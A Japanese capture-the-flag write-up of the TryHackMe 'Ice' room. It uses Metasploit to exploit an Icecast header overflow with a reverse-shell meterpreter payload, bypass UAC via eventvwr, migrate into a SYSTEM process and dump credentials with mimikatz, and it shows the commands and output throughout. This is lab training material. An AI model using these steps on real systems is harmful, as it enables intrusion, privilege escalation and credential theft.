はじめに
本記事はTryHackMeのWriteupです。
RoomはIceで、Difficulty(難易度)はEasyです。
Iceは一般的なハッキングフローの流れに沿って、偵察行為を皮切りに発見したサービスの脆弱性を特定します。脆弱性特定後、Metasploit Frameworkを用いて管理者権限を取得します。
このRoomでは、Metasploit Frameworkに関する基礎的な部分について学ぶことができます。
Connect以降のTaskについて解説していきます。
Recon
はじめに偵察行為から行います。
偵察行為については以前書いたContent Discovery Webアプリケーションに対する偵察行為を参照。
ポートスキャン
空いているポートを特定するためにはNmapを使用します。
ここでは事前に用意したシェルを介してポートスキャンを実行しています。
$ ./port_scan.sh <対象ホストのIPアドレス>
##################
# Port scan tool #
##################
*Detailed scan :1
*Full scan :2
***Select scanning method by number***
1
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-16 23:08 JST
Nmap scan report for 10.10.137.216
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2023-05-16T14:10:19+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=Dark-PC
| Not valid before: 2023-05-15T14:04:37
|_Not valid after: 2023-11-14T14:04:37
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp open http Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Dark-PC
| NetBIOS computer name: DARK-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-05-16T09:10:12-05:00
| smb2-time:
| date: 2023-05-16T14:10:13
|_ start_date: 2023-05-16T14:04:35
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 0267ab38d98d (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h15m00s, deviation: 2h30m00s, median: 0s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.63 seconds
Scan completed
ポートスキャンの結果から8000番ポートを使用したIcecastの稼働が確認できます。
上記検出結果を使用してこのタスクは解決できます。
Gain Access
Icecastの脆弱性を特定後、Metasploit Frameworkのmsfconsoleを起動して、エクスプロイトを検索します。
エクスプロイトの検索
以下のコマンドを実行して、msfconsoleを起動します。
$ msfconsole
search Icecastコマンドを使用してターゲットのエクスプロイトを検索します。
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header
以下のコマンドを実行して、モジュールをセットします。
use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/icecast_header) >
show optionsコマンドを実行して、必要な設定を行います。
Module options (exploit/windows/http/icecast_header):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 8000 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 1.2.3.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
exploitコマンドを実行します。
[*] Started reverse TCP handler on 1.2.3.4:4444
[*] Sending stage (175686 bytes) to 10.10.137.216
[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 10.10.137.216:49194) at 2023-05-16 23:21:35 +0900
Escalate
管理者権限を取得するために、ローカルで利用可能なエクスプロイトを検索し、権限昇格を狙います。
ローカルエクスプロイトの検索
getuidコマンドを実行することで、現在のユーザー情報が確認できます。
Server username: Dark-PC\Dark
psコマンドを実行することで、 Icecastプロセスを実行しているユーザーが確認できます。
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
416 4 smss.exe
500 692 svchost.exe
544 536 csrss.exe
588 692 svchost.exe
592 536 wininit.exe
604 584 csrss.exe
652 584 winlogon.exe
692 592 services.exe
700 592 lsass.exe
708 592 lsm.exe
816 692 svchost.exe
884 692 svchost.exe
932 692 svchost.exe
1060 692 svchost.exe
1192 692 svchost.exe
1260 692 TrustedInstaller.exe
1304 500 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe
1320 1288 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
1376 692 spoolsv.exe
1404 692 svchost.exe
1468 692 sppsvc.exe
1480 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe
1548 816 WmiPrvSE.exe
1568 692 amazon-ssm-agent.exe
1588 692 mscorsvw.exe
1652 692 LiteAgent.exe
1692 692 svchost.exe
1832 692 Ec2Config.exe
2008 692 vds.exe
2064 1588 mscorsvw.exe
2104 692 svchost.exe
2296 1320 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2636 692 SearchIndexer.exe
2840 816 rundll32.exe x64 1 Dark-PC\Dark C:\Windows\System32\rundll32.exe
2884 2840 dinotify.exe x64 1 Dark-PC\Dark C:\Windows\System32\dinotify.exe
ローカルで利用可能なエクスプロイトを検索するために、run post/multi/recon/local_exploit_suggesterコマンドを実行します。
[*] 10.10.137.216 - Collecting local exploits for x86/windows...
[*] 10.10.137.216 - 174 exploit checks are being tried...
[+] 10.10.137.216 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.137.216 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.137.216 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.137.216 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.137.216 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.137.216 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.137.216 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.137.216 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[+] 10.10.137.216 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.137.216 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
3 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable.
4 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable.
5 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
6 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
7 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
8 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
9 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
10 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
11 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
12 exploit/windows/local/always_install_elevated No The target is not exploitable.
13 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
14 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
15 exploit/windows/local/bthpan No The target is not exploitable.
16 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
17 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
18 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
19 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
20 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
21 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
22 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
23 exploit/windows/local/ikeext_service No The check raised an exception.
24 exploit/windows/local/ipass_launch_app No The check raised an exception.
25 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
26 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
27 exploit/windows/local/mqac_write No The target is not exploitable.
28 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
29 exploit/windows/local/ms14_070_tcpip_ioctl No The target is not exploitable.
30 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
31 exploit/windows/local/ms16_016_webdav No The target is not exploitable.
32 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The target is not exploitable.
33 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
34 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
35 exploit/windows/local/ms_ndproxy No The target is not exploitable.
36 exploit/windows/local/novell_client_nicm No The target is not exploitable.
37 exploit/windows/local/ntapphelpcachecontrol No The target is not exploitable.
38 exploit/windows/local/panda_psevents No The target is not exploitable.
39 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
1行目のexploit/windows/local/bypassuac_eventvwrエクスプロイトについて確認します。
このモジュールは、現在のユーザー配下にあるレジストリの特別なキーを取得し、Windowsイベント ビューアの起動時に呼び出されるカスタムコマンドを挿入することで、Windows UACをバイパスします。
ソースコードはbypassuac_eventvwr.rbから確認できます。
権限を昇格させるために、現在のセッションをバッググラウンドに移行します。
Background session 1? [y/N]
現在のセッションはsessionsコマンドで確認できます。
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows Dark-PC\Dark @ DARK-PC 1.2.3.4:4444 -> 10.10.137.216:49221 (10.10.137.216)
use exploit/windows/local/bypassuac_eventvwrコマンドを実行してモジュールをセットします。
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
ローカルエクスプロイトを実行するためには、セッションを選択する必要があります。
従ってset session 1コマンドを実行します。
session => 1
lhostが正しいことを確認し、runコマンドを実行します。
[*] Started reverse TCP handler on 1.2.3.4:4444
[*] Sending stage (175686 bytes) to 10.10.137.216
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[*] Meterpreter session 2 opened (1.2.3.4:4444 -> 10.10.137.216:49215) at 2023-05-16 23:54:58 +0900
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175686 bytes) to 10.10.137.216
[*] Meterpreter session 3 opened (1.2.3.4:4444 -> 10.10.137.216:49232) at 2023-05-16 23:55:08 +0900
[*] Cleaning up registry keys ...
権限昇格完了後、getprivsコマンドを実行して権限が拡張されたことを確認します。
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
Looting
追加の認証情報を収集し、マシン上に保存されているハッシュを解析する方法を学びます。
このタスクでは、Windows内の認証機能を提供しているlsassサービスと対話するために、必要なアクセス許可を持つプロセスに移行する必要があります。
プロセスの移行
psコマンドを実行して、NT AUTHORITY\SYSTEMによってプロセスが実行されていることを確認します。
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
500 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
588 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
592 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
600 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
692 592 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
700 592 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
708 592 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
816 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
856 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
884 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
932 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1060 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1192 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1304 500 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe
1320 1288 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
1376 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1404 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1468 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
1480 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe
1568 692 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1652 692 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1680 816 slui.exe x64 1 Dark-PC\Dark C:\Windows\System32\slui.exe
1692 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1832 692 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
2008 692 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
2104 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2196 2296 cmd.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\cmd.exe
2260 2296 cmd.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\cmd.exe
2296 1320 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
2448 356 powershell.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
2524 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
2624 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe
2636 692 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
2840 816 rundll32.exe x64 1 Dark-PC\Dark C:\Windows\System32\rundll32.exe
2884 2840 dinotify.exe x64 1 Dark-PC\Dark C:\Windows\System32\dinotify.exe
3004 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
migrate -N spoolsv.exeコマンドを実行して、プロセスを移行します。
[*] Migrating from 2448 to 1376...
[*] Migration completed successfully.
getuidコマンドを実行すると、権限昇格が確認できます。
Server username: NT AUTHORITY\SYSTEM
Mimikatzは、Windows システムのメモリからパスワード、NTLM ハッシュ、Kerberos チケットなどの認証情報を抽出するために使用できるツールです。
load kiwiコマンドを実行してダンプします。
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
creds_allコマンドを実行して、パスワードが確認できます。
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
DARK-PC$ WORKGROUP (null)
Dark Dark-PC Password01!
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Dark Dark-PC Password01!
dark-pc$ WORKGROUP (null)
Post-Exploitation
helpコマンドを使用してこのタスクは解決できます。
おわりに
以上、IceのWriteupでした。
msfconsoleの操作に慣れるためには、ちょうど良いRoomです。
Metasploit Frameworkについては、以前書いた脆弱性とエクスプロイトについて理解するに基本的な使用方法を記載しています。